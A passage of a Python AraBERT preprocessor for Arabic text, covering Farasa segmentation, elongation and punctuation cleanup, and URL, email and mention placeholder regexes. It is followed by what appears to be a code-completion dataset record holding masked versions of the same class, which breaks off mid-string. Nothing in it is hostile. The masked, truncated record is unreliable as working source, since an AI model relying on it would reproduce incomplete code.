if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
"[",
"]",
]:
segmented_line.append("[" + word + "]")
continue
if "+" not in word:
segmented_line.append(word)
continue
segmented_word = self._split_farasa_output(word)
segmented_line.extend(segmented_word)
return " ".join(segmented_line)
def _split_farasa_output(self, word):
segmented_word = []
temp_token = ""
for i, c in enumerate(word):
if c == "+":
# if the token is KAF, it could be a suffix or prefix
if temp_token == "ك":
# if we are at the second token, then KAF is surely a prefix
if i == 1:
segmented_word.append(temp_token + "+")
temp_token = ""
# If the KAF token is between 2 tokens
elif word[i - 2] == "+":
# if the previous token is prefix, then this KAF must be a prefix
if segmented_word[-1][-1] == "+":
segmented_word.append(temp_token + "+")
temp_token = ""
# else it is a suffix, this KAF could not be a second suffix
else:
segmented_word.append("+" + temp_token)
temp_token = ""
# if Kaf is at the end, this is handled with the statement after the loop
elif temp_token in prefix_list:
segmented_word.append(temp_token + "+")
temp_token = ""
elif temp_token in suffix_list:
segmented_word.append("+" + temp_token)
temp_token = ""
else:
segmented_word.append(temp_token)
temp_token = ""
continue
temp_token += c
if temp_token != "":
if temp_token in suffix_list:
segmented_word.append("+" + temp_token)
else:
segmented_word.append(temp_token)
return segmented_word
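# Illustrative examples (assumptions, not from the original code):
# _split_farasa_output('ال+كتاب') -> ['ال+', 'كتاب']
# _split_farasa_output('كتاب+ها') -> ['كتاب', '+ها']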
def _tokenize_arabic_words_farasa(self, line_input):
if self.keep_emojis:
# keep emoji tokens intact and run Farasa segmentation on the remaining words one by one
line_farasa = []
for word in line_input.split():
if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
line_farasa.append(word)
else:
line_farasa.append(self.farasa_segmenter.segment(word))
else:
line_farasa = self.farasa_segmenter.segment(line_input).split()
segmented_line = []
for index, word in enumerate(line_farasa):
if word in ["[", "]"]:
continue
if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
"[",
"]",
]:
segmented_line.append("[" + word + "]")
continue
segmented_word = []
for token in word.split("+"):
if token in prefix_list:
segmented_word.append(token + "+")
elif token in suffix_list:
segmented_word.append("+" + token)
else:
segmented_word.append(token)
segmented_line.extend(segmented_word)
return " ".join(segmented_line)
def _remove_elongation(self, text):
"""
:param text: the input text from which to remove elongation
:return: the de-elongated text
"""
# loop over the number of times the regex matched the text
for index_ in range(len(re.findall(regex_tatweel, text))):
elongation = re.search(regex_tatweel, text)
if elongation:
elongation_pattern = elongation.group()
elongation_replacement = elongation_pattern[0]
elongation_pattern = re.escape(elongation_pattern)
text = re.sub(
elongation_pattern, elongation_replacement, text, flags=re.MULTILINE
)
else:
break
return text
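# Illustrative example (assumption): any run of 3 or more identical non-digit
# characters is collapsed to a single character, e.g. 'رااااائع' -> 'رائع'.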
def _remove_redundant_punct(self, text):
text_ = text
result = re.search(redundant_punct_pattern, text)
dif = 0
while result:
sub = result.group()
sub = sorted(set(sub), key=sub.index)
sub = " " + "".join(list(sub)) + " "
text = "".join(
(text[: result.span()[0] + dif], sub, text[result.span()[1] + dif :])
)
text_ = "".join(
(text_[: result.span()[0]], text_[result.span()[1] :])
).strip()
dif = abs(len(text) - len(text_))
result = re.search(redundant_punct_pattern, text_)
text = re.sub(r"\s+", " ", text)
return text.strip()
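# Illustrative example (assumption): runs of 2+ punctuation marks are reduced to
# their unique characters (in order of first appearance) and padded with spaces,
# e.g. 'رائع!!!؟؟' -> 'رائع !؟'.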
prefix_list = [
"ال",
"و",
"ف",
"ب",
"ك",
"ل",
"لل",
"\u0627\u0644",
"\u0648",
"\u0641",
"\u0628",
"\u0643",
"\u0644",
"\u0644\u0644",
"س",
]
suffix_list = [
"ه",
"ها",
"ك",
"ي",
"هما",
"كما",
"نا",
"كم",
"هم",
"هن",
"كن",
"ا",
"ان",
"ين",
"ون",
"وا",
"ات",
"ت",
"ن",
"ة",
"\u0647",
"\u0647\u0627",
"\u0643",
"\u064a",
"\u0647\u0645\u0627",
"\u0643\u0645\u0627",
"\u0646\u0627",
"\u0643\u0645",
"\u0647\u0645",
"\u0647\u0646",
"\u0643\u0646",
"\u0627",
"\u0627\u0646",
"\u064a\u0646",
"\u0648\u0646",
"\u0648\u0627",
"\u0627\u062a",
"\u062a",
"\u0646",
"\u0629",
]
other_tokens = ["[رابط]", "[مستخدم]", "[بريد]"]
# the never_split list is used with the transformers library
prefix_symbols = [x + "+" for x in prefix_list]
suffix_symblos = ["+" + x for x in suffix_list]
never_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))
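# Illustrative note (assumption): never_split_tokens ends up holding entries such as
# 'ال+', '+ها' and '[رابط]', which can for example be passed to a BERT tokenizer's
# `never_split` option so the segmentation markers are not split apart during tokenization.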
url_regexes = [
r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)",
r"@(https?|ftp)://(-\.)?([^\s/?\.#-]+\.?)+(/[^\s]*)?$@iS",
r"http[s]?://[a-zA-Z0-9_\-./~\?=%&]+",
r"www[a-zA-Z0-9_\-?=%&/.~]+",
r"[a-zA-Z]+\.com",
r"(?=http)[^\s]+",
r"(?=www)[^\s]+",
r"://",
]
user_mention_regex = r"@[\w\d]+"
email_regexes = [r"[\w-]+@([\w-]+\.)+[\w-]+", r"\S+@\S+"]
redundant_punct_pattern = (
r"([!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ【»؛\s+«–…‘]{2,})"
)
regex_tatweel = r"(\D)\1{2,}"
rejected_chars_regex = r"[^0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘]"
regex_url_step1 = r"(?=http)[^\s]+"
regex_url_step2 = r"(?=www)[^\s]+"
regex_url = r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)"
regex_mention = r"@[\w\d]+"
regex_email = r"\S+@\S+"
chars_regex = r"0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘"
white_spaced_double_quotation_regex = r'\"\s+([^"]+)\s+\"'
white_spaced_single_quotation_regex = r"\'\s+([^']+)\s+\'"
white_spaced_back_quotation_regex = r"\`\s+([^`]+)\s+\`"
white_spaced_em_dash = r"\—\s+([^—]+)\s+\—"
left_spaced_chars = r" ([\]!#\$%\),\.:;\?}٪’،؟”؛…»·])"
right_spaced_chars = r"([\[\(\{“«‘*\~]) "
left_and_right_spaced_chars = r" ([\+\-\<\=\>\@\\\^\_\|\–]) "
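# Minimal usage sketch (assumptions: the module is importable as `preprocess` and
# pyarabic/farasapy are installed); not part of the original file:
#
#   from preprocess import ArbertmoPreprocessor
#   prep = ArbertmoPreprocessor("aubmindlab/bert-base-arabertv2")
#   cleaned = prep.preprocess("نص عربي للتجربة http://example.com")
#   restored = prep.unpreprocess(cleaned)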
|
normal
|
{
"blob_id": "6c3f60f05adbebe521ba08d7a7e9fc10b1cc914f",
"index": 2907,
"step-1": "<mask token>\n\n\nclass ArbertmoPreprocessor:\n <mask token>\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. 
Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. 
Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط \\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n 
return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". 
Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. 
Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. 
Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط 